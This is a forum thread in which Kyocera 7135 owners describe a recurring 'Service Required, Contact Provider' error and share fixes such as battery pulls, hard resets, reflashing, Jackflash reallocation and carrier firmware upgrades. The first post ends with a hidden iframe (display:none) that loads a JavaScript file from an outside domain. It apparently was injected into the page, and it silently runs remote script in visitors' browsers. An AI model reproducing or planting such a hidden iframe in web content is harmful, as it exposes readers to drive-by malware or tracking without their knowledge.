I have started getting the message, "Service Required, Contact Provider". Normally it takes a soft reset to clear it, but not that does not work. Any ideas? I got my phone in about March and it is running the original software because Version could not update it last time I was in.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
I got this when I [ahemm] did the upgrade over a month ago with the early birds. Could no longer connect to the VZW system, or could I connect to the phone with the software. Since there have been suggestions about different resets to get the phone back in order.
My gut feeling was that it had lost the PRL somehow, and with the inability to *228 i could not get it back on line. Catch 22.
Fortunately, on the eve of my vacation, I got a replacement by just being a nice [dumb] guy.

I had a scary situation with my phone this weekend. The phone was originally purchased through Kyocera in February, updated to the latest firmware about 3 weeks ago, which IMO has made it slightly less stable. Yesterday I was out running errands, even made a phonecall or two without problem. Later that day, my phone indicated it was "searching" for a signal. I then received the "Service Required, Contact Provider" message.
I performed a series of hard resets as well as turning the phone side on and off but could not resolve the issue. When I got home, I thought I would try accessing the phone via KWPST. Unable to access the OPTIONS screen on the phone side because of the message (I could access the rainbow screen, and KWPST could access my phone at that point; I don't know if that would have been helpful).
Well, I pulled the battery and let the phone sit for about an hour. I then pressed and held the reset button for >30 seconds. Put the battery back in, same problem. Now I really began to get concerned, didn't know what else to do. I left the battery out all night, popped it back in this morning... PROBLEM RESOLVED! I quickly did a *228 1 and 2 Restored from backup. Back to normal.
Since I bought my phone from Kyocera directly, I didn't think an exchange through Verizon would have been an option. My phone also has a few battle wounds from previous falls, so I wasn't sure what Kyocera would charge me for a return. I'm glad the problem decided to go away

I went ahead and sent mine to Kyocera. I was starting to get the message all the time when the battery got low. I did the same thing and left the battery out which seemed to fix the problem.
That is a scary message. Does anyone know why that is happening? I can't afford for my phone to be inoperable for that long. I need to be able to receive and respond to text messages.
Thought I would post an update. As I said, I successfully got my phone working again after a hard reset. I re-installed from backup and the problem returned. I thought maybe there was a program conflicting with the phone side somehow. So I did another hard reset and added some very basic programs I've been using without problem for at least 2 months. Went to the baseball game yesterday, made a phonecall or two without problem. During the game, I received the error message again.
I thought for sure I would have to contact Kyocera now. But, since I got home I've not had the problem. I thought maybe it was a tower/location problem, but my wife's phone (not a 7135, but is on Verizon's network) has had no problems with receiving a signal.
If it happens again, I'll have to call Kyocera. I would hate to think they wouldn't do anything. I bought my phone when the price was $699

I decided to reflash my phone this evening since I've been receiving the "Service Required" message more frequently (almost after every call). The first time I flashed my phone I received this message immediately after reseting. The problem went away (so I thought) by turing the phone off and on.
I've noticed over the past 2 weeks or so (since I've had to do a few hard resets) that my phone would beep twice when booting. I'd never noticed this before. I wondered if something happened with the flash process.
I re-flashed the phone, following the directions as written. Everything went smooth. Hard reset... no more beeps. I did not receive a "Service Required" error. Everything seems to be working. Perhaps there was a hiccup during the flash the first time, I don't know. Thought I would pass this along.

I've discovered what I believe is the cause of this error on my phone. It was related to Jackflash and it's allocation of flash memory which was conflicting with the software upgrade. When running Jackflash for the first time after the upgrade it would ask,
"An OS Upgrade has overwritten part of the Flash. Do You wish to attempt to recover the remaining contents?"
I answered yes, mostly because I barely read the question. After another firmware upgrade and running Jackflash, I answered NO. I then released then reallocated the flash memory via Jackflash. No problems since!

I sent my phone off to Kyocera only to have them tell me after it was returned that I was getting the message because I had generic software, not the Verizon version. They did not tell me that when I was conversing with them on the phone before I returned it. I had gotten the phone from my insurance company when my 6035 was dropped and quit working. After several months of waiting for my Verizon store to get the new software and cable, I finally got it upgraded. It took the tech around 30 minutes and I have not received the service required message since.
I am wondering though why the phone worked for 6 months or so with the incorrect software then started getting the error message?
I feel like I am at AA here and just want to thank everyone for sharing their problems and solutions.
I have been cursed by the Service Required-Contact Provider bug too several times. I usually just have Verizon take the phone back and get a new one, but that is getting old.
I am hoping someone has a real solution here. Is it a ROM bug Kyocera is aware of and fixing? If so by when? Is there a work around in the meantime?
I was instructed by Kyocera tech to get a new phone, rebuild my profile from the ground up...ugh, and that should fix any profile corruption I may have. But I am very skeptical of this response. They don't seem to know what the deal is.
When I started getting the message I sent my phone to Kyocera. It was returned, supposedly repaired so I call them when I started getting the message again. They advised me that all that was needed was the software upgrade from Verizon. I took the phone to Verizon and had it upgraded. By that time they had received the software and could install it. Several weeks after the software upgrade I started getting the message again. I left the message on the phone, drove it down to Verizon and they ended up exchanging the phone for me. I have not received the message (YET!) on the new phone.
I'm on my third replacement. I never had this problem with the 6035. First one would reset itself continously. Went through Kyocera and got a replacement. Used that phone without incident for a month or two when one day I did not have my headset with me and discovered that the earpiece was not working! Spoke to Kyocera "while San Diego was burining" and after jumping through their customer service hoops got another RMA for the phone I have now. Well gues what the phone I have now has the "Service Required - Contact Provider" message. I first got this error in San Juan, Puerto Rico but after leaving the phone off for several days the thing started working again in my home town of Miami, Florida. Well three days later and the message is back. and this time no matter what I do the message is not going away. So I called Kyocera again and now they want me to upgrade the firmware 1.0.44/29. I have to drive 100 miles to find a store that knows how to do this and then there are no guarrantees it will work. I did the upgrade of the phone software to mz 1.0.44 using the old KWPST Tool myself but this version of KWPST will not let me upgrade the PDA software to .29 since it does not recognize it. I have the images but not the KWPST.
If anyone has it can you please email or PM me? I currently have a phone with mz 1.0.44 and sz 1.0.23 PRL 50111.
I am almost 100% certain it will not work after the upgrade but just to keep these guys happy I want to do exactly what they say.
I think that if anymore problems show up with this phone I'm going to cut my losses and buy a new phone. Maybe I can get someone to buy a pretty PDA on EBAY.
I actually had a few 6035's do this as well. It seemed as though it would happen only when I was travelling and didn't turn off the phone for long periods of time. Haven't had that problem (yet) with my 7135.
Just to share my experience - with Alltel service, i also began receiving this message and went through days of reseting and reloading everything on my phone. The store referred me to Kyocera who sent me a new phone about 3 weeks ago. No problems yet.
Ok all - I upgraded my phone software like Kyocera Tech Support Requested and the problem does appear to have gone away. I just haven't been able to put the phone through a decent performance test to see if the problem reappears. I sometime hold 1.5 hour conference calls with this thing. I would consider this the last and ultimate test that I need to perform. The only strange effect that I have noticed from the phone is that while the phone is in the cradle the signal is fine. But on occassion when I remove the phone from the cradle and I mean just a half inch above it, it goes into searching for signal mode and does not go away until I put it back in the cradle. I can then remove it and it is usually ok. Since I don't trust this phone to much, and I have a corporate plan, I asked for a phone upgrade and got another kyocera phone for free so I don't have to go 2 weeks without connectivity next time I send this back for repair.
